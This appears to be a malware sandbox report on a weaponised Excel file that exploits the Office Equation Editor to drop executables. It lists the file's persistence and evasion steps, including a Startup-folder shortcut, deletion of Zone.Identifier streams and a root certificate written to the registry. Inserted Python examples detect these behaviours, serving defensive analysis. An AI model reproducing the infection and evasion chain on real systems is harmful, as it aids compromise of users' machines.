Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREC60.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@51/57@23/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{6618c428-0583-4059-a498-a8ec319ccd46}
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc[1].exe.4.dr, Qm29/Lz41.cs .Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.4.dr, Qm29/Lz41.cs .Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: sys30.exe.6.dr, Qm29/Lz41.cs .Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 6.0.vbc.exe.d80000.0.unpack, Qm29/Lz41.cs .Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 6.2.vbc.exe.d80000.1.unpack, Qm29/Lz41.cs .Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.sys30.exe.1220000.0.unpack, Qm29/Lz41.cs .Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.2.sys30.exe.1220000.3.unpack, Qm29/Lz41.cs .Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.2.sys30.exe.1220000.1.unpack, Qm29/Lz41.cs .Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00D8B27A push 00000000h; iretd 6_2_00D8B2C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_00D8CE66 push 00000000h; iretd 6_2_00D8CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_0122CE66 push 00000000h; iretd 7_2_0122CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_0122B27A push 00000000h; iretd 7_2_0122B2C4
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0122CE66 push 00000000h; iretd 9_2_0122CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0122B27A push 00000000h; iretd 9_2_0122B2C4
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062B3E7 push edx; ret 9_2_0062B40A
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062B4D3 push ebx; ret 9_2_0062B4D6
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062B4D7 push ebx; ret 9_2_0062B4DA
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062B480 push edx; ret 9_2_0062B482
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_01020295 pushfd ; ret 9_2_01020296
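The "push X; ret" / "push 0; iretd" pairs listed above are disguised branches: the pushed value becomes the return address, so ret transfers control to it without a visible jmp or call target. The following is an added example for this report, not sandbox code and not bytes from the sample; it scans a raw code buffer for the opcode pairs the signature describes. SAMPLE_CODE is a constructed buffer that reproduces the three forms the report lists (push imm8; iretd, push reg; ret, pushfd; ret) next to an ordinary prologue.

```python
"""Scan raw x86 code bytes for the push/ret and push/iretd pairs the sandbox
reports as 'code obfuscation techniques (call, push, ret)'.

Added example for this report; not sandbox code.  SAMPLE_CODE below is a
constructed buffer, not bytes taken from the sample.
"""
import re

# 32-bit opcode forms covered:
#   push imm8 = 6A ib   push imm32 = 68 id   push r32 = 50+r   pushfd = 9C
#   ret       = C3      ret imm16  = C2 iw   iretd    = CF
_PUSH = rb"(?:\x6a.|\x68.{4}|[\x50-\x57]|\x9c)"
_RET = rb"(?:\xc3|\xc2..|\xcf)"
GADGET_RE = re.compile(rb"(?P<push>" + _PUSH + rb")(?P<ret>" + _RET + rb")", re.DOTALL)

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def describe_push(b):
    op = b[0]
    if op == 0x6A:
        return f"push {b[1]:#04x}"
    if op == 0x68:
        return f"push {int.from_bytes(b[1:5], 'little'):#010x}"
    if 0x50 <= op <= 0x57:
        return f"push {REG32[op - 0x50]}"
    return "pushfd"


def describe_ret(b):
    if b[0] == 0xC3:
        return "ret"
    if b[0] == 0xCF:
        return "iretd"
    return f"ret {int.from_bytes(b[1:3], 'little'):#06x}"


def find_push_ret_gadgets(code, base=0):
    """Return [(address, text)] for each push/ret pair found in `code`.

    This is a linear byte scan, not a disassembler: a match can straddle real
    instruction boundaries or sit in data, so treat hits as leads to confirm
    in a disassembler rather than as proof.
    """
    return [(base + m.start(), f"{describe_push(m.group('push'))}; {describe_ret(m.group('ret'))}")
            for m in GADGET_RE.finditer(code)]


# Constructed sample: an ordinary prologue, then the forms listed in the report.
SAMPLE_CODE = bytes.fromhex(
    "55 8b ec"             # push ebp; mov ebp, esp   (ordinary prologue, no hit)
    "6a 00 cf"             # push 0; iretd            (as at 6_2_00D8B27A)
    "90"                   # nop
    "52 c3"                # push edx; ret            (as at 9_2_0062B3E7)
    "9c c3"                # pushfd; ret              (as at 9_2_01020295)
    "68 78 56 34 12 c3"    # push 0x12345678; ret     (classic disguised jmp)
    "c3"                   # lone ret, no preceding push
)

if __name__ == "__main__":
    for addr, text in find_push_ret_gadgets(SAMPLE_CODE, base=0x0062B000):
        print(f"{addr:#010x}  {text}")
```

Two caveats when reading hits like these on this sample. vbc.exe and sys30.exe are managed binaries (the report decompiles them to Qm29/Lz41.cs and Ed06/Qd84.cs), so the native regions that can hold such pairs are small and a linear scan over the image will match data as readily as code. The process 9 hits at 0x0062B3E7..0x0062B4D7 and 0x01020295 also sit outside the 0x01220000 image base that the other sys30.exe hits and the 7.0.sys30.exe.1220000 dump share, which makes the unpacked memory dumps, not the dropped file, the place to confirm them.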
Binary contains a suspicious time stamp
Source: sys30s.exe.7.dr Static PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
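The timestamp above is IMAGE_FILE_HEADER.TimeDateStamp, seconds since the Unix epoch, and 0xC7142059 decodes to the 2075 date the report prints. The following is an added example for this report, not sandbox code: it reads the field from a PE header, decodes it, and classifies it against the date the file was seen. The header it parses is a constructed minimal MZ/PE stub carrying the reported value, and ANALYSIS_DATE is an assumed observation date, not one taken from the report.

```python
"""Decode and sanity-check a PE TimeDateStamp such as the 0xC7142059 the
report flags on sys30s.exe.7.dr.

Added example for this report; not sandbox code.  build_stub_pe() returns a
constructed minimal DOS/PE header carrying the reported value, and
ANALYSIS_DATE is an assumed observation date, not one from the report.
"""
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def read_pe_timestamp(data):
    """Return IMAGE_FILE_HEADER.TimeDateStamp from a PE image (bytes)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # After the 4-byte signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def timestamp_to_utc(ts):
    # Seconds since the Unix epoch; a timedelta keeps post-2038 values working everywhere.
    return EPOCH + timedelta(seconds=ts)


def assess_timestamp(ts, observed_at, is_dotnet=False):
    """Classify a link time against the date the file was observed.

    Caveat: deterministic builds (Roslyn /deterministic, on by default in
    SDK-style .NET projects; MSVC /Brepro) store a content hash in this field
    instead of a time, so an absurd value on a managed binary is weak
    evidence by itself.
    """
    if ts == 0:
        return "zeroed"
    when = timestamp_to_utc(ts)
    if when > observed_at:
        return "future (deterministic-build hash?)" if is_dotnet else "future"
    if when < datetime(1995, 1, 1, tzinfo=timezone.utc):
        return "implausibly old"
    return "plausible"


def build_stub_pe(timestamp):
    """Constructed minimal image: MZ header with e_lfanew=0x40, then PE signature + COFF header."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    # Machine=i386, 3 sections, TimeDateStamp, no symbols, PE32 optional header size, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 3, timestamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


REPORTED_TS = 0xC7142059                                   # value from the report
ANALYSIS_DATE = datetime(2021, 9, 1, tzinfo=timezone.utc)  # assumed observation date

if __name__ == "__main__":
    ts = read_pe_timestamp(build_stub_pe(REPORTED_TS))
    print(f"{ts:#010x} -> {timestamp_to_utc(ts):%a %b %d %H:%M:%S %Y UTC}: "
          f"{assess_timestamp(ts, ANALYSIS_DATE, is_dotnet=True)}")
```

The is_dotnet flag matters for this sample: sys30s.exe decompiles to C# (the Astronotplart/*.cs entries below), so a far-future link time is consistent with a deterministic build as well as with deliberate timestomping, and the other indicators in this report, not the timestamp, carry the verdict.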
Source: vbc[1].exe.4.dr, Ed06/Qd84.cs High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: vbc.exe.4.dr, Ed06/Qd84.cs High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: sys30.exe.6.dr, Ed06/Qd84.cs High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 6.0.vbc.exe.d80000.0.unpack, Ed06/Qd84.cs High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 6.2.vbc.exe.d80000.1.unpack, Ed06/Qd84.cs High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: sys30s.exe.7.dr, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
Source: sys30s.exe.7.dr, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.cs High entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
Source: sys30s.exe.7.dr, Astronotplart/gabKErPURPS76kDKjrme.cs High entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
Source: sys30s.exe.7.dr, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.cs High entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
Source: sys30s.exe.7.dr, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs High entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
Source: 7.0.sys30.exe.1220000.0.unpack, Ed06/Qd84.cs High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 7.2.sys30.exe.1220000.3.unpack, Ed06/Qd84.cs High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 8.2.sys30.exe.1220000.1.unpack, Ed06/Qd84.cs High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe File created: C:\Users\user\AppData\Local\Temp\sys30s.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\Public\vbc.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe File opened: C:\Users\user\AppData\Local\sys4h57g\sys30.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe File opened: C:\Users\user\AppData\Local\sys4h57g\sys30.exe:Zone.Identifier read attributes | delete
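The drop, execute, persist and Zone.Identifier steps recorded in the Persistence, Boot Survival and Hooking sections above are each a single telemetry event, which is why the Sigma titles in the overview can match them. The following is an added example for this report, not the sandbox's Sigma rules: it replays that chain as a constructed Sysmon-like event stream and runs one rule per step over it. The event field names and the use of a FileDelete event for the Zone.Identifier stream are assumptions about the telemetry, not something the report states.

```python
"""Replay the drop-and-persist chain the report documents as event-based
detections, in the spirit of the Sigma hits listed in the overview.

Added example for this report; these are not the sandbox's Sigma rules.
EVENTS is constructed in a Sysmon-like shape (EventType, Image, ParentImage,
TargetFilename) from paths the report lists; the field names and the
'FileDelete' event for the Zone.Identifier stream are assumptions.
"""

SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def _field(ev, name):
    """Case-folded string field; missing fields compare as empty."""
    return str(ev.get(name, "")).lower()


def rule_eqnedt32_drops_exe(ev):
    return (ev["EventType"] == "FileCreate"
            and _field(ev, "Image").endswith("\\eqnedt32.exe")
            and _field(ev, "TargetFilename").endswith(".exe"))


def rule_eqnedt32_spawns_process(ev):
    # The Equation Editor has no legitimate reason to create child processes.
    return (ev["EventType"] == "ProcessCreate"
            and _field(ev, "ParentImage").endswith("\\eqnedt32.exe"))


def rule_exec_from_suspicious_folder(ev):
    image = _field(ev, "Image")
    return ev["EventType"] == "ProcessCreate" and any(d in image for d in SUSPICIOUS_DIRS)


def rule_startup_folder_persistence(ev):
    return ev["EventType"] == "FileCreate" and STARTUP_DIR in _field(ev, "TargetFilename")


def rule_zone_identifier_removed(ev):
    # Deleting the Zone.Identifier stream strips Mark-of-the-Web from a downloaded file.
    return (ev["EventType"] == "FileDelete"
            and _field(ev, "TargetFilename").endswith(":zone.identifier"))


RULES = {
    "File dropped by EQNEDT32.EXE": rule_eqnedt32_drops_exe,
    "Office equation editor starts processes": rule_eqnedt32_spawns_process,
    "Execution from suspicious folder": rule_exec_from_suspicious_folder,
    "Startup folder persistence": rule_startup_folder_persistence,
    "Zone.Identifier stream removed": rule_zone_identifier_removed,
}


def detect(events):
    """Return [(event index, rule name)] for every rule each event satisfies."""
    return [(i, name) for i, ev in enumerate(events) for name, fn in RULES.items() if fn(ev)]


EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"
SYS30 = r"C:\Users\user\AppData\Local\sys4h57g\sys30.exe"
STARTUP_LNK = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk"

# Constructed event stream following the report's chain, plus two benign events (5, 6).
EVENTS = [
    {"EventType": "FileCreate", "Image": EQNEDT, "TargetFilename": VBC},
    {"EventType": "ProcessCreate", "Image": VBC, "ParentImage": EQNEDT},
    {"EventType": "FileCreate", "Image": VBC, "TargetFilename": SYS30},
    {"EventType": "FileCreate", "Image": VBC, "TargetFilename": STARTUP_LNK},
    {"EventType": "FileDelete", "Image": VBC, "TargetFilename": VBC + ":Zone.Identifier"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventType": "FileCreate", "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\Desktop\~$Enclosed.xlsx"},
]

if __name__ == "__main__":
    for index, name in detect(EVENTS):
        print(f"event {index}: {name}")
```

Event 2, the copy of vbc.exe into AppData\Local\sys4h57g\sys30.exe, deliberately matches nothing: a write of a PE into a user-writable directory by an unsigned process is common enough that it needs a prevalence or signer check, which is why the report lists it under the weaker "Drops PE files" heading rather than as a Sigma hit. The two EQNEDT32.EXE rules are the high-confidence ones here; the Equation Editor never writes executables or starts children in normal use, so a single event is enough to alert on.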
Stores large binary data to the registry
Source: C:\Users\Public\vbc.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
